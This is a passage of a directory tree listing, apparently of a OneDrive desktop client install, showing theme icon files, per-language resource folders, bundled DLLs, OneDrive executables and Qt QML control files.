│   │       │   │   │   │   │   │   │   ├── resumeSyncing.svg
│   │       │   │   │   │   │   │   │   ├── scrollbarChevronDown.svg
│   │       │   │   │   │   │   │   │   ├── scrollbarChevronUp.svg
│   │       │   │   │   │   │   │   │   ├── sendFeedbackIcon.svg
│   │       │   │   │   │   │   │   │   ├── settingsIcon2.svg
│   │       │   │   │   │   │   │   │   ├── settingsIcon3.svg
│   │       │   │   │   │   │   │   │   ├── settingsIcon.svg
│   │       │   │   │   │   │   │   │   ├── shareicon.svg
│   │       │   │   │   │   │   │   │   ├── share.svg
│   │       │   │   │   │   │   │   │   ├── shield_icon.svg
│   │       │   │   │   │   │   │   │   ├── signInExclamation.svg
│   │       │   │   │   │   │   │   │   ├── signIn.svg
│   │       │   │   │   │   │   │   │   ├── stackedIceCubes.svg
│   │       │   │   │   │   │   │   │   ├── stackicon.svg
│   │       │   │   │   │   │   │   │   ├── stack.svg
│   │       │   │   │   │   │   │   │   ├── startOneDrive.svg
│   │       │   │   │   │   │   │   │   ├── sv_fre_choose_folder.js
│   │       │   │   │   │   │   │   │   ├── sv_FRE_Tutorial_Intro.js
│   │       │   │   │   │   │   │   │   ├── sv_FRE_Tutorial_Share.js
│   │       │   │   │   │   │   │   │   ├── SyncStatusBadgeCloud.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusBadgeError.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusBadgeInfo.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusBadgeOffline.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusBadgePaused.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusBadgeSyncing.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusBadgeWarning.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusError.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusOffline.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusPaused.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusSubBadgeCloud.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusSubBadgeError.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusSubBadgePaused.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusSubBadgeSyncing.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusSubBadgeWarning.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusSynced.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusSyncing.svg
│   │       │   │   │   │   │   │   │   ├── SyncStatusWarning.svg
│   │       │   │   │   │   │   │   │   ├── timelineLong.svg
│   │       │   │   │   │   │   │   │   ├── timelineShort.svg
│   │       │   │   │   │   │   │   │   ├── treeChevronDown.svg
│   │       │   │   │   │   │   │   │   ├── treeChevronLeft.svg
│   │       │   │   │   │   │   │   │   ├── treeChevronRight.svg
│   │       │   │   │   │   │   │   │   ├── unlinkIcon.svg
│   │       │   │   │   │   │   │   │   ├── unlockicon.svg
│   │       │   │   │   │   │   │   │   ├── upgrade.svg
│   │       │   │   │   │   │   │   │   ├── vaultFull.svg
│   │       │   │   │   │   │   │   │   ├── vaultIntro.svg
│   │       │   │   │   │   │   │   │   ├── vaultUnlocked.svg
│   │       │   │   │   │   │   │   │   ├── warning-symbol_grey.svg
│   │       │   │   │   │   │   │   │   ├── warning-symbol_yellow.svg
│   │       │   │   │   │   │   │   │   ├── waterGlass.svg
│   │       │   │   │   │   │   │   │   ├── win7_kfm_done.svg
│   │       │   │   │   │   │   │   │   ├── win7_unlink-1.svg
│   │       │   │   │   │   │   │   │   ├── win7_unlink-2.svg
│   │       │   │   │   │   │   │   │   ├── word.svg
│   │       │   │   │   │   │   │   │   └── yellowFolder.svg
│   │       │   │   │   │   │   │   └── lightTheme
│   │       │   │   │   │   │   │       ├── accountDetection.svg
│   │       │   │   │   │   │   │       ├── acm_cloud_import.svg
│   │       │   │   │   │   │   │       ├── acm_confetti.svg
│   │       │   │   │   │   │   │       ├── acmDismissIcon.svg
│   │       │   │   │   │   │   │       ├── ACMegaImageForQuotaErrors.svg
│   │       │   │   │   │   │   │       ├── acm_low_disk_space_online_only.svg
│   │       │   │   │   │   │   │       ├── addedFolderIcon_mac.svg
│   │       │   │   │   │   │   │       ├── addedFolderIcon_win.svg
│   │       │   │   │   │   │   │       ├── animation_Pause.svg
│   │       │   │   │   │   │   │       ├── animation_Play.svg
│   │       │   │   │   │   │   │       ├── backArrow.svg
│   │       │   │   │   │   │   │       ├── BlueCloudCritical_default.svg
│   │       │   │   │   │   │   │       ├── BlueCloudCritical_Win11.svg
│   │       │   │   │   │   │   │       ├── BlueCloudFull_default.svg
│   │       │   │   │   │   │   │       ├── BlueCloudFull_Win11.svg
│   │       │   │   │   │   │   │       ├── BlueCloudOverLimit.svg
│   │       │   │   │   │   │   │       ├── blue_cloud.svg
│   │       │   │   │   │   │   │       ├── blurrect.png
│   │       │   │   │   │   │   │       ├── bugIcon.svg
│   │       │   │   │   │   │   │       ├── CameraRollBackup.svg
│   │       │   │   │   │   │   │       ├── cancelIcon.svg
│   │       │   │   │   │   │   │       ├── checkboxComposite.svg
│   │       │   │   │   │   │   │       ├── checkmark_hovered.svg
│   │       │   │   │   │   │   │       ├── checkmark_in_progress.svg
│   │       │   │   │   │   │   │       ├── checkmark_selected.svg
│   │       │   │   │   │   │   │       ├── chevron.svg
│   │       │   │   │   │   │   │       ├── chevronUp.svg
│   │       │   │   │   │   │   │       ├── Clipchamp.svg
│   │       │   │   │   │   │   │       ├── clock_icon.svg
│   │       │   │   │   │   │   │       ├── CloudIconError.svg
│   │       │   │   │   │   │   │       ├── CloudIconOffline.svg
│   │       │   │   │   │   │   │       ├── CloudIconPaused.svg
│   │       │   │   │   │   │   │       ├── CloudIconSynced.svg
│   │       │   │   │   │   │   │       ├── CloudIconSyncing.svg
│   │       │   │   │   │   │   │       ├── CloudIconWarning.svg
│   │       │   │   │   │   │   │       ├── cloud.svg
│   │       │   │   │   │   │   │       ├── ColoredFolders_Flyout.svg
│   │       │   │   │   │   │   │       ├── ColoredFolders.svg
│   │       │   │   │   │   │   │       ├── completed_icon.svg
│   │       │   │   │   │   │   │       ├── Defender.svg
│   │       │   │   │   │   │   │       ├── Designer.svg
│   │       │   │   │   │   │   │       ├── dialog_dismiss.svg
│   │       │   │   │   │   │   │       ├── done_graphic.svg
│   │       │   │   │   │   │   │       ├── errorIcon2.svg
│   │       │   │   │   │   │   │       ├── errorIcon.svg
│   │       │   │   │   │   │   │       ├── excel.svg
│   │       │   │   │   │   │   │       ├── exclamation.svg
│   │       │   │   │   │   │   │       ├── exitIcon.svg
│   │       │   │   │   │   │   │       ├── eyelash.svg
│   │       │   │   │   │   │   │       ├── feedbackIcon.svg
│   │       │   │   │   │   │   │       ├── fileLockIcon.svg
│   │       │   │   │   │   │   │       ├── filesNotSyncingDisabled.svg
│   │       │   │   │   │   │   │       ├── filesNotSyncing.svg
│   │       │   │   │   │   │   │       ├── file.svg
│   │       │   │   │   │   │   │       ├── finderExtensionPrompt.svg
│   │       │   │   │   │   │   │       ├── folderIcon20x20.svg
│   │       │   │   │   │   │   │       ├── folderIcon2.svg
│   │       │   │   │   │   │   │       ├── folderIcon.svg
│   │       │   │   │   │   │   │       ├── folder_image_desktop_mac.svg
│   │       │   │   │   │   │   │       ├── folder_image_desktop.svg
│   │       │   │   │   │   │   │       ├── folder_image_documents_mac.svg
│   │       │   │   │   │   │   │       ├── folder_image_documents.svg
│   │       │   │   │   │   │   │       ├── folder_image_pictures_mac.svg
│   │       │   │   │   │   │   │       ├── folder_image_pictures.svg
│   │       │   │   │   │   │   │       ├── forwardArrow.svg
│   │       │   │   │   │   │   │       ├── fre_choose_folder.js
│   │       │   │   │   │   │   │       ├── fre_choose_folder.svg
│   │       │   │   │   │   │   │       ├── fre_done.js
│   │       │   │   │   │   │   │       ├── fre_done.svg
│   │       │   │   │   │   │   │       ├── fre_email_hrd.js
│   │       │   │   │   │   │   │       ├── fre_email_hrd.svg
│   │       │   │   │   │   │   │       ├── fre_email_hrd_win7.svg
│   │       │   │   │   │   │   │       ├── freeUpSpace.svg
│   │       │   │   │   │   │   │       ├── FRE_Tutorial_FilesOnDemand_Important.svg
│   │       │   │   │   │   │   │       ├── FRE_Tutorial_FilesOnDemand_OnlineOnly.svg
│   │       │   │   │   │   │   │       ├── FRE_Tutorial_FilesOnDemand_Placeholder.svg
│   │       │   │   │   │   │   │       ├── FRE_Tutorial_Intro.js
│   │       │   │   │   │   │   │       ├── FRE_Tutorial_Intro.svg
│   │       │   │   │   │   │   │       ├── FRE_Tutorial_Mobile.js
│   │       │   │   │   │   │   │       ├── FRE_Tutorial_Mobile.svg
│   │       │   │   │   │   │   │       ├── FRE_Tutorial_Share.js
│   │       │   │   │   │   │   │       ├── FRE_Tutorial_Share.svg
│   │       │   │   │   │   │   │       ├── globeIcon20x20.svg
│   │       │   │   │   │   │   │       ├── globeIcon2.svg
│   │       │   │   │   │   │   │       ├── globeIcon.svg
│   │       │   │   │   │   │   │       ├── globe.svg
│   │       │   │   │   │   │   │       ├── helpIcon.svg
│   │       │   │   │   │   │   │       ├── helpSubIcon.svg
│   │       │   │   │   │   │   │       ├── HeroImage_FolderBackupACM.svg
│   │       │   │   │   │   │   │       ├── houseIcon.svg
│   │       │   │   │   │   │   │       ├── iceBucket.svg
│   │       │   │   │   │   │   │       ├── infiniteDiamond.webp
│   │       │   │   │   │   │   │       ├── infiniteLightRayDiamond.webp
│   │       │   │   │   │   │   │       ├── InfoBlue.svg
│   │       │   │   │   │   │   │       ├── infoIcon.svg
│   │       │   │   │   │   │   │       ├── infoIconYellow.svg
│   │       │   │   │   │   │   │       ├── kfm_acm_gpo.svg
│   │       │   │   │   │   │   │       ├── kfmAllBackedUp.svg
│   │       │   │   │   │   │   │       ├── kfmCloseFileToBackup.svg
│   │       │   │   │   │   │   │       ├── kfm_mega_gpo.svg
│   │       │   │   │   │   │   │       ├── layerIcon.svg
│   │       │   │   │   │   │   │       ├── lightBulb.svg
│   │       │   │   │   │   │   │       ├── lightRayDiamond.webp
│   │       │   │   │   │   │   │       ├── list_checkbox.svg
│   │       │   │   │   │   │   │       ├── loading_spinner_arrow.svg
│   │       │   │   │   │   │   │       ├── loading_spinner.svg
│   │       │   │   │   │   │   │       ├── loading.svg
│   │       │   │   │   │   │   │       ├── lock_graphic.svg
│   │       │   │   │   │   │   │       ├── lock_icon.svg
│   │       │   │   │   │   │   │       ├── lockIcon.svg
│   │       │   │   │   │   │   │       ├── mac_fre_choose_folder.js
│   │       │   │   │   │   │   │       ├── mac_FRE_Tutorial_Intro.js
│   │       │   │   │   │   │   │       ├── mac_FRE_Tutorial_Share.js
│   │       │   │   │   │   │   │       ├── manageStorage.svg
│   │       │   │   │   │   │   │       ├── onDemandFilesDehydrate.svg
│   │       │   │   │   │   │   │       ├── onDemandFiles.svg
│   │       │   │   │   │   │   │       ├── onDemandSelectiveSync.svg
│   │       │   │   │   │   │   │       ├── onenote.svg
│   │       │   │   │   │   │   │       ├── openFileIcon.svg
│   │       │   │   │   │   │   │       ├── openFolder.svg
│   │       │   │   │   │   │   │       ├── optionalDiagnosticData.svg
│   │       │   │   │   │   │   │       ├── outlook.svg
│   │       │   │   │   │   │   │       ├── overflowIcon.svg
│   │       │   │   │   │   │   │       ├── partiallyFreezing.svg
│   │       │   │   │   │   │   │       ├── paused.svg
│   │       │   │   │   │   │   │       ├── pauseIcon.svg
│   │       │   │   │   │   │   │       ├── powerpoint.svg
│   │       │   │   │   │   │   │       ├── premium_gem.svg
│   │       │   │   │   │   │   │       ├── premiumIcon20x20.svg
│   │       │   │   │   │   │   │       ├── premiumIcon2.svg
│   │       │   │   │   │   │   │       ├── premiumIcon.svg
│   │       │   │   │   │   │   │       ├── recycleBinIcon20x20.svg
│   │       │   │   │   │   │   │       ├── recycleBinIcon.svg
│   │       │   │   │   │   │   │       ├── recycleBin.svg
│   │       │   │   │   │   │   │       ├── reportProblemIcon.svg
│   │       │   │   │   │   │   │       ├── requiredDiagnosticData.svg
│   │       │   │   │   │   │   │       ├── reSignIn.svg
│   │       │   │   │   │   │   │       ├── resumeIcon.svg
│   │       │   │   │   │   │   │       ├── resumeSyncing.svg
│   │       │   │   │   │   │   │       ├── scrollbarChevronDown.svg
│   │       │   │   │   │   │   │       ├── scrollbarChevronUp.svg
│   │       │   │   │   │   │   │       ├── sendFeedbackIcon.svg
│   │       │   │   │   │   │   │       ├── settingsIcon2.svg
│   │       │   │   │   │   │   │       ├── settingsIcon3.svg
│   │       │   │   │   │   │   │       ├── settingsIcon.svg
│   │       │   │   │   │   │   │       ├── shareIcon.svg
│   │       │   │   │   │   │   │       ├── share.svg
│   │       │   │   │   │   │   │       ├── shield_icon.svg
│   │       │   │   │   │   │   │       ├── signInExclamation.svg
│   │       │   │   │   │   │   │       ├── signIn.svg
│   │       │   │   │   │   │   │       ├── stackedIceCubes.svg
│   │       │   │   │   │   │   │       ├── stackIcon.svg
│   │       │   │   │   │   │   │       ├── stack.svg
│   │       │   │   │   │   │   │       ├── startOneDrive.svg
│   │       │   │   │   │   │   │       ├── sv_fre_choose_folder.js
│   │       │   │   │   │   │   │       ├── sv_FRE_Tutorial_Intro.js
│   │       │   │   │   │   │   │       ├── sv_FRE_Tutorial_Share.js
│   │       │   │   │   │   │   │       ├── SyncStatusBadgeCloud.svg
│   │       │   │   │   │   │   │       ├── SyncStatusBadgeError.svg
│   │       │   │   │   │   │   │       ├── SyncStatusBadgeInfo.svg
│   │       │   │   │   │   │   │       ├── SyncStatusBadgeOffline.svg
│   │       │   │   │   │   │   │       ├── SyncStatusBadgePaused.svg
│   │       │   │   │   │   │   │       ├── SyncStatusBadgeSyncing.svg
│   │       │   │   │   │   │   │       ├── SyncStatusBadgeWarning.svg
│   │       │   │   │   │   │   │       ├── SyncStatusError.svg
│   │       │   │   │   │   │   │       ├── SyncStatusOffline.svg
│   │       │   │   │   │   │   │       ├── SyncStatusPaused.svg
│   │       │   │   │   │   │   │       ├── SyncStatusSubBadgeCloud.svg
│   │       │   │   │   │   │   │       ├── SyncStatusSubBadgeError.svg
│   │       │   │   │   │   │   │       ├── SyncStatusSubBadgePaused.svg
│   │       │   │   │   │   │   │       ├── SyncStatusSubBadgeSyncing.svg
│   │       │   │   │   │   │   │       ├── SyncStatusSubBadgeWarning.svg
│   │       │   │   │   │   │   │       ├── SyncStatusSynced.svg
│   │       │   │   │   │   │   │       ├── SyncStatusSyncing.svg
│   │       │   │   │   │   │   │       ├── SyncStatusWarning.svg
│   │       │   │   │   │   │   │       ├── timelineLong.svg
│   │       │   │   │   │   │   │       ├── timelineShort.svg
│   │       │   │   │   │   │   │       ├── treeChevronDown.svg
│   │       │   │   │   │   │   │       ├── treeChevronLeft.svg
│   │       │   │   │   │   │   │       ├── treeChevronRight.svg
│   │       │   │   │   │   │   │       ├── unlinkIcon.svg
│   │       │   │   │   │   │   │       ├── unlockIcon.svg
│   │       │   │   │   │   │   │       ├── upgrade.svg
│   │       │   │   │   │   │   │       ├── vaultFull.svg
│   │       │   │   │   │   │   │       ├── vaultIntro.svg
│   │       │   │   │   │   │   │       ├── vaultUnlocked.svg
│   │       │   │   │   │   │   │       ├── warning-symbol_grey.svg
│   │       │   │   │   │   │   │       ├── warning-symbol_yellow.svg
│   │       │   │   │   │   │   │       ├── waterGlass.svg
│   │       │   │   │   │   │   │       ├── win7_kfm_done.svg
│   │       │   │   │   │   │   │       ├── win7_unlink-1.svg
│   │       │   │   │   │   │   │       ├── win7_unlink-2.svg
│   │       │   │   │   │   │   │       ├── word.svg
│   │       │   │   │   │   │   │       └── yellowFolder.svg
│   │       │   │   │   │   │   ├── info.png
│   │       │   │   │   │   │   ├── ipcfile.dll
│   │       │   │   │   │   │   ├── ipcsecproc.dll
│   │       │   │   │   │   │   ├── IRMProtectors
│   │       │   │   │   │   │   │   ├── microsoft.aip.pdfprotector.dll
│   │       │   │   │   │   │   │   ├── Microsoft.Office.Irm.MsoProtector.dll
│   │       │   │   │   │   │   │   └── Microsoft.Office.Irm.OfcProtector.dll
│   │       │   │   │   │   │   ├── is
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── it
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ja
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ka
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── KFMHeroToast.png
│   │       │   │   │   │   │   ├── KFMLockedFileToast.png
│   │       │   │   │   │   │   ├── KFMScanExclusionToast.png
│   │       │   │   │   │   │   ├── kk
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── km-KH
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── kn
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ko
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── kok
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ku-Arab
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── lb-LU
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── libbz2-1.dll
│   │       │   │   │   │   │   ├── libcrypto-3-x64.dll
│   │       │   │   │   │   │   ├── libEGL.dll
│   │       │   │   │   │   │   ├── libffi-8.dll
│   │       │   │   │   │   │   ├── libgcc_s_seh-1.dll
│   │       │   │   │   │   │   ├── libgio-2.0-0.dll
│   │       │   │   │   │   │   ├── libGLESv2.dll
│   │       │   │   │   │   │   ├── libglib-2.0-0.dll
│   │       │   │   │   │   │   ├── libgmodule-2.0-0.dll
│   │       │   │   │   │   │   ├── libgobject-2.0-0.dll
│   │       │   │   │   │   │   ├── libgsf-1-114.dll
│   │       │   │   │   │   │   ├── libiconv-2.dll
│   │       │   │   │   │   │   ├── libintl-8.dll
│   │       │   │   │   │   │   ├── liblzma-5.dll
│   │       │   │   │   │   │   ├── libpcre2-8-0.dll
│   │       │   │   │   │   │   ├── libssl-3-x64.dll
│   │       │   │   │   │   │   ├── libwinpthread-1.dll
│   │       │   │   │   │   │   ├── libxml2-2.dll
│   │       │   │   │   │   │   ├── LoadingPage.html
│   │       │   │   │   │   │   ├── LoggingPlatform.dll
│   │       │   │   │   │   │   ├── LogoImages
│   │       │   │   │   │   │   │   └── RNResources
│   │       │   │   │   │   │   │       └── resources.pri
│   │       │   │   │   │   │   ├── LogUploader.dll
│   │       │   │   │   │   │   ├── Lottie.min.js
│   │       │   │   │   │   │   ├── lt
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── lv
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── Microsoft.Graphics.Canvas.dll
│   │       │   │   │   │   │   ├── Microsoft.ReactNative.dll
│   │       │   │   │   │   │   ├── Microsoft.SharePoint.Calc.dll
│   │       │   │   │   │   │   ├── Microsoft.SharePoint.dll
│   │       │   │   │   │   │   ├── Microsoft.SharePoint.exe
│   │       │   │   │   │   │   ├── Microsoft.SharePoint.HttpSvr.dll
│   │       │   │   │   │   │   ├── Microsoft.SharePoint.NativeMessagingClient.exe
│   │       │   │   │   │   │   ├── Microsoft.SharePoint.png
│   │       │   │   │   │   │   ├── Microsoft.SharePoint.WebSocketClient.dll
│   │       │   │   │   │   │   ├── Microsoft.Toolkit.Win32.UI.XamlHost.dll
│   │       │   │   │   │   │   ├── Microsoft.UI.Xaml.dll
│   │       │   │   │   │   │   ├── minizip.dll
│   │       │   │   │   │   │   ├── mi-NZ
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── mip_ClientTelemetry.dll
│   │       │   │   │   │   │   ├── mip_core.dll
│   │       │   │   │   │   │   ├── mip_file_sdk.dll
│   │       │   │   │   │   │   ├── mip_protection_sdk.dll
│   │       │   │   │   │   │   ├── mip_upe_sdk.dll
│   │       │   │   │   │   │   ├── mk
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ml-in
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── mn
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── mr
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ms
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── msipc.dll
│   │       │   │   │   │   │   ├── msvcp140_1_app.dll
│   │       │   │   │   │   │   ├── msvcp140_1.dll
│   │       │   │   │   │   │   ├── msvcp140_2_app.dll
│   │       │   │   │   │   │   ├── msvcp140_app.dll
│   │       │   │   │   │   │   ├── msvcp140_atomic_wait.dll
│   │       │   │   │   │   │   ├── msvcp140.dll
│   │       │   │   │   │   │   ├── mt-MT
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── nb-NO
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ne-NP
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── nh.dll
│   │       │   │   │   │   │   ├── nl
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── nn-NO
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── nso-ZA
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── OD4
│   │       │   │   │   │   │   │   └── zlib1.dll
│   │       │   │   │   │   │   ├── OneDrive.App.dll
│   │       │   │   │   │   │   ├── OneDriveFileLauncher.exe
│   │       │   │   │   │   │   ├── OneDriveLauncher.exe
│   │       │   │   │   │   │   ├── OneDriveLogo.png
│   │       │   │   │   │   │   ├── OneDrivePatcher.exe
│   │       │   │   │   │   │   ├── OneDriveSetup.exe
│   │       │   │   │   │   │   ├── OneDriveStandaloneUpdater.exe
│   │       │   │   │   │   │   ├── OneDriveTelemetryExperimental.dll
│   │       │   │   │   │   │   ├── OneDriveTelemetryStable.dll
│   │       │   │   │   │   │   ├── OneDriveUpdaterService.exe
│   │       │   │   │   │   │   ├── or-IN
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── pa
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── pa-Arab-PK
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── pl
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── platforms
│   │       │   │   │   │   │   │   └── qwindows.dll
│   │       │   │   │   │   │   ├── pt-BR
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── pt-PT
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── qml
│   │       │   │   │   │   │   │   ├── FabExMDL2.ttf
│   │       │   │   │   │   │   │   ├── QtQml
│   │       │   │   │   │   │   │   │   ├── Models.2
│   │       │   │   │   │   │   │   │   │   ├── modelsplugin.dll
│   │       │   │   │   │   │   │   │   │   ├── plugins.qmltypes
│   │       │   │   │   │   │   │   │   │   └── qmldir
│   │       │   │   │   │   │   │   │   ├── plugins.qmltypes
│   │       │   │   │   │   │   │   │   ├── qmldir
│   │       │   │   │   │   │   │   │   └── qmlplugin.dll
│   │       │   │   │   │   │   │   ├── QtQuick
│   │       │   │   │   │   │   │   │   ├── Controls
│   │       │   │   │   │   │   │   │   │   ├── ApplicationWindow.qml
│   │       │   │   │   │   │   │   │   │   ├── plugins.qmltypes
│   │       │   │   │   │   │   │   │   │   ├── Private
│   │       │   │   │   │   │   │   │   │   │   ├── BasicTableView.qml
│   │       │   │   │   │   │   │   │   │   │   ├── CalendarUtils.js
│   │       │   │   │   │   │   │   │   │   │   ├── FocusFrame.qml
│   │       │   │   │   │   │   │   │   │   │   ├── qmldir
│   │       │   │   │   │   │   │   │   │   │   ├── ScrollBar.qml
│   │       │   │   │   │   │   │   │   │   │   ├── ScrollViewHelper.qml
│   │       │   │   │   │   │   │   │   │   │   ├── StackView.js
│   │       │   │   │   │   │   │   │   │   │   ├── style.js
│   │       │   │   │   │   │   │   │   │   │   ├── Style.qml
│   │       │   │   │   │   │   │   │   │   │   ├── SystemPaletteSingleton.qml
│   │       │   │   │   │   │   │   │   │   │   ├── TableViewItemDelegateLoader.qml
│   │       │   │   │   │   │   │   │   │   │   ├── TextSingleton.qml
│   │       │   │   │   │   │   │   │   │   │   └── TreeViewItemDelegateLoader.qml
│   │       │   │   │   │   │   │   │   │   ├── qmldir
│   │       │   │   │   │   │   │   │   │   ├── qtquickcontrolsplugin.dll
│   │       │   │   │   │   │   │   │   │   ├── ScrollView.qml
│   │       │   │   │   │   │   │   │   │   ├── Styles
│   │       │   │   │   │   │   │   │   │   │   ├── Base
│   │       │   │   │   │   │   │   │   │   │   │   ├── BasicTableViewStyle.qml
│   │       │   │   │   │   │   │   │   │   │   │   ├── ScrollViewStyle.qml
│   │       │   │   │   │   │   │   │   │   │   │   └── TreeViewStyle.qml
│   │       │   │   │   │   │   │   │   │   │   ├── Flat
│   │       │   │   │   │   │   │   │   │   │   │   ├── qmldir
│   │       │   │   │   │   │   │   │   │   │   │   └── qtquickextrasflatplugin.dll
│   │       │   │   │   │   │   │   │   │   │   └── qmldir
│   │       │   │   │   │   │   │   │   │   ├── TableViewColumn.qml
│   │       │   │   │   │   │   │   │   │   └── TreeView.qml
│   │       │   │   │   │   │   │   │   ├── Controls.2
│   │       │   │   │   │   │   │   │   │   ├── Button.qml
│   │       │   │   │   │   │   │   │   │   ├── CheckBox.qml
│   │       │   │   │   │   │   │   │   │   ├── ComboBox.qml
│   │       │   │   │   │   │   │   │   │   ├── DialogButtonBox.qml
│   │       │   │   │   │   │   │   │   │   ├── Dialog.qml
│   │       │   │   │   │   │   │   │   │   ├── ItemDelegate.qml
│   │       │   │   │   │   │   │   │   │   ├── Label.qml
│   │       │   │   │   │   │   │   │   │   ├── MenuItem.qml
│   │       │   │   │   │   │   │   │   │   ├── Menu.qml
│   │       │   │   │   │   │   │   │   │   ├── plugins.qmltypes
│   │       │   │   │   │   │   │   │   │   ├── Popup.qml
│   │       │   │   │   │   │   │   │   │   ├── ProgressBar.qml
│   │       │   │   │   │   │   │   │   │   ├── qmldir
│   │       │   │   │   │   │   │   │   │   ├── qtquickcontrols2plugin.dll
│   │       │   │   │   │   │   │   │   │   ├── RadioButton.qml
│   │       │   │   │   │   │   │   │   │   ├── ScrollBar.qml
│   │       │   │   │   │   │   │   │   │   ├── ScrollIndicator.qml
│   │       │   │   │   │   │   │   │   │   ├── ScrollView.qml
│   │       │   │   │   │   │   │   │   │   └── TextField.qml
│   │       │   │   │   │   │   │   │   ├── Extras
│   │       │   │   │   │   │   │   │   │   ├── plugins.qmltypes
│   │       │   │   │   │   │   │   │   │   ├── qmldir
│   │       │   │   │   │   │   │   │   │   └── qtquickextrasplugin.dll
│   │       │   │   │   │   │   │   │   ├── Layouts
│   │       │   │   │   │   │   │   │   │   ├── plugins.qmltypes
│   │       │   │   │   │   │   │   │   │   ├── qmldir
│   │       │   │   │   │   │   │   │   │   └── qquicklayoutsplugin.dll
│   │       │   │   │   │   │   │   │   ├── Templates.2
│   │       │   │   │   │   │   │   │   │   ├── plugins.qmltypes
